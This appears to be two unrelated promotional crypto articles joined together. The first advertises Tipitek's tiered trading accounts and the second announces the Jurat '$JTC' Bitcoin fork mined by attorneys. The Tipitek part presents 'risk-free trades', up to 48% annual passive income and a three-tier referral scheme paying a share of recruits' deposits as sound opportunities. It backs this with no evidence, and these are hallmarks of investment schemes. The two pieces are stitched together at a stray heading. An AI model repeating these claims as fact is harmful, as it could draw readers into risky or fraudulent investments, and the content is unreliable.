MINI Account: A trading account with a minimum deposit of $500 and a minimum investment period of 180 days. Clients get the opportunity to use leverage up to 1:5, receive daily email newsletters, request consultations with the company analyst, and access educational materials.

EASY START Account: A trading account with a minimum deposit of $5,000 and a minimum investment period of 180 days. Clients can use leverage up to 1:5, receive weekly email newsletters, weekly consultations with an analyst, one trading signal per week, and, upon request, get a personal manager and educational materials.

START+ Account: A trading account with a minimum deposit of $25,000 and an investment period starting from 180 days. It offers leverage up to 1:5, daily email newsletters with transaction history analysis, weekly consultations with an analyst, two trading signals per week, two risk-free trades, one built-in robot, and 1.5% interest on savings accounts. A personal manager and educational materials are available upon request.

PRO Account: A trading account with a minimum deposit of $100,000 and a minimum investment period of 90 days. Clients can work with leverage up to 1:10, receive weekly email newsletters, have four consultations per month with the company analyst, full support from a personal manager, up to five trading signals per week, and two built-in trading robots. Educational materials are available upon request, and savings accounts earn 2% interest.

PRO+ Account: Another trading account with a minimum deposit of $500,000 and a minimum investment period of 90 days. It offers leverage up to 1:10, six consultations per month with the company analyst, full support from a personal manager, up to ten trading signals per week, four risk-free trades, and two built-in trading bots. Educational materials can be requested. This account type includes a 2% interest rate on savings accounts.

EXTRA Account: A trading account with a minimum deposit of $1,000,000 and a minimum investment period of 90 days. Clients have unlimited possibilities, including leverage up to 1:20, weekly email newsletters, full support from the company analyst and a personal manager, an unlimited number of trading signals, access to automated trading, and six risk-free trades. Individual educational materials are available upon request, and savings accounts earn 4% interest.

What do they have in common?

All six trading accounts share the absence of commissions from Tipitek’s side and are denominated in cryptocurrency (BTC, USDT). When your deposit reaches the level corresponding to another account type, the opportunity to enjoy the benefits of that higher level opens up.

Tipitek goes beyond simple cryptocurrency exchange; it is the perfect comprehensive solution for traders, investors, and partners. Cryptoves LLP openly declares the advantages of Tipitek, attracting an increasing number of active clients. The new division is already quite popular among traders due to its multifunctionality and modernity.

Briefly about Tipitek: It is a structural division of Cryptoves LLP, whose activities began in 2017, initially specializing in cloud cryptocurrency mining. The company is legally registered in Singapore. The company’s leadership and team work closely together, resulting in rapid development and the creation of the Tipitek trading division with its own platform. Is Tipitek currently at the peak of its development? It’s challenging to say, as Cryptoves LLP has not stopped evolving since its inception.

What makes Tipitek notable? Tipitek offers advanced charts and several types of orders to active platform users. Cryptoves LLP’s management and team emphasize that Tipitek is characterized by:

High Speed and Stability: Users frequently note that transactions can be executed in microseconds, saving them time.

Security: Cryptoves LLP applies only verified and modern tools to ensure customer security, emphasizing that security and customer trust are always their top priorities.

Ability to Implement Trading Strategies: Developers have created a user-friendly interface, allowing both beginners and experienced traders and investors to implement trading strategies. Tipitek also provides a detailed order book overview and a choice of trading pairs.

Mobility: Cryptoves LLP acknowledges the need for traders to work from anywhere in the world at any time. Tipitek Trade is available for all mobile devices.

As we can see, Cryptoves LLP boldly emphasizes the advantages of its new product, as the company has taken into account the most critical aspects: price and time priority, simultaneous use of multiple order types, a dynamic maker-taker fee schedule based on trading volume.

Cryptocurrency platform Tipitek introduces an affiliate program as another way to earn

People interested in digital assets are likely familiar with the functionality, security, reliability, and modernity of Tipitek. It’s worth noting that Cryptoves LLP is rapidly progressing toward its goal, attracting more and more clients, including company founders and professional traders. The news of the affiliate program being introduced is already widely spreading on the Internet, so Tipitek can expect a new wave of interest in the platform.

What sparks interest in Tipitek? Primarily, clients can work not only with cryptocurrencies but also with other digital assets: tokenized stocks, indices, precious metals, commodities, and energy assets. This simplifies the work of traders, saving them time as there is no need to use multiple platforms simultaneously.

Despite the relatively recent emergence of the new division, it is safe to say that Tipitek is already a reliable, stable, and secure means of achieving the goals of traders and investors. Working with Tipitek is genuinely simple and comfortable.

Investors and traders can not only buy and trade digital assets but also store them. The Tipitek security system is at the highest level. Since the launch of Tipitek, Cryptoves LLP’s leadership has repeatedly stated in interviews that the company does not plan to stop here and will continue to develop and improve Tipitek. Based on the events happening in the company, it’s hard to argue with that. Tipitek is ahead in development compared to its peers and even many “veterans.”

How to earn with Tipitek? For Tipitek clients, there are classic ways to earn:

Profit from Trading: The trading platform’s uniqueness is characterized by highly favorable trading conditions, a wide variety of the most liquid financial instruments, the use of trading signals, and trading bots. Analytical and educational materials are also available to Tipitek clients.

Passive Income: This is a savings investment account service with an interest rate significantly exceeding that of banks. Interest payments can be made weekly. Depending on the chosen account type, Tipitek clients can earn up to 48% annually.

What does launching the Tipitek affiliate program give clients? It expands earning opportunities for Tipitek clients. The Tipitek affiliate program is a three-tier referral program that allows you to earn 3-7% of each deposit made by your referrals. To do this, you only need to register and obtain a referral link, which can be posted on social networks, thematic forums, etc.

The affiliate program can also be combined with passive income and trading, significantly increasing your earnings. Thus, joining the affiliate program on the platform is another additional opportunity to earn with Tipitek.

Jurat Launches Layer-1 Mined by Attorneys 6547

A group of attorneys and blockchain engineers are building a new Bitcoin fork blockchain using an emerging legal enforcement protocol that bridges the blockchain to state and federal courts. Called Jurat, the protocol enables capabilities like freezing disputed coins or recovering stolen coins after a hack, all under the auspices of the justice system. The native coin of the new fork is called $JTC.

The primary objectives for the new blockchain are to ensure robust consumer protection for cryptocurrency users and provide on-chain enforcement for legal rights afforded in commercial transactions, property transfers, and the banking system.

The $JTC token is due to be listed on exchanges in the near future. At this time, $JTC mining is open for licensed attorneys in all jurisdictions and may be made available to legacy Bitcoin miners in the future.

Attorneys Line Up To Participate

To start the process for becoming a $JTC miner, attorneys should complete the mining information request form, available on Jurat’s website.

$JTC miners receive $JTC tokens as compensation for supporting the network and helping court rulings to execute on-chain. Mining with Jurat also offers attorneys the chance to become better acquainted with the technology underlying blockchain transactions and participate in a more legally compliant Web3.

Mining by Non-Attorneys

Mining applications for Jurat are currently open to licensed attorneys only. Jurat may expand to include legacy Bitcoin miners in the future.

How to obtain $JTC

$JTC forked at Bitcoin block height 717808, which occurred on January 8, 2022. All addresses that contained $BTC as of that block received $JTC at a 1:1 ratio to their $BTC and can claim the coins using the Jurat Wallet, which is available for Android (Play Store), IOS (App Store), Windows (Jurat.io), and Mac (Mac App Store).

Currently, $JTC cannot be bought on exchanges but will be listed soon. l

Why Does Blockchain Need Jurat?

Jurat was founded by Mike Kanovitz, a partner at Loevy & Loevy in Chicago, USA, who works in Web3 and traditional civil litigation. He conceived of Jurat as a means to provide consumer protection in the crypto space after seeing many clients victimized by fraud and theft.

“Witnessing people lose their hard-earned savings to hackers and phishing scams only to be left with no legal recourse inspired me to create Jurat. “said Mike Kanovitz, Jurat CEO and co-founder.

After creating the protocol and proving that legal rights could be enforced on-chain without sacrificing the benefits of decentralization, Kanovitz recognized that the technology could help make blockchains safer and more usable for mainstream commercial transactions.

“Blockchain technology has the potential to benefit consumers and businesses in countless ways, but the absence of an effective layer for enforcing legal rights prevents it from achieving mainstream adoption,” he said.

The $JTC Bitcoin fork uses Jurat to offer the unique ability to recover digital assets and freeze accounts associated with illicit activities. The protocol can provide legal recourse for users without involving intermediaries or asset custodians while maintaining the full decentralization of the network. There are four steps to the process:

  1. A $JTC user who needs legal recourse because of on-chain crime, a mistaken transaction, or lost private keys can create a Jurat request ID through the Jurat UI. The Jurat ID is a string of characters that specifies the transaction that the claimant wants the court to order. For example, a transaction to send coins from a scammer’s wallet back to the true owner. Armed with the ID, the user can bring the matter to court.
  2. After filing a case, the user provides the ID to the court. If the judge agrees with the lawsuit, they signify this to Jurat blockchain nodes by including the ID in their written opinion and placing it on the court’s public docket.
  3. Once on the public docket, specialized nodes can access the court’s opinion and recognize the Jurat ID. The code informs the nodes that the judge has ruled and what transaction the judge has ordered.
  4. Each miner then verifies the court order, like verifying a private key signature. The process is automatic and does not require any intermediaries.

$JTC has already been used live in court. Recently, a US federal judge considered the cryptocurrency accounts of several sanctioned individuals, including a wallet belonging to North Korean state-sponsored hackers called the Lazarus Group. The court ordered the hackers’ accounts frozen, and the Jurat nodes executed the court orders automatically and seamlessly, preventing the hackers from spending the $JTC in the sanctioned accounts.

Building Legal3 With Jurat

The success of Jurat technology in the case brought against the Lazarus group, and others is an early step in Jurat’s broader goal of introducing a legal base layer for every transaction in Web3.

Jurat will continue to add new attorneys to its mining operation as the $JTC launch date draws closer and encourages all attorneys who have a passion for justice on the blockchain to apply.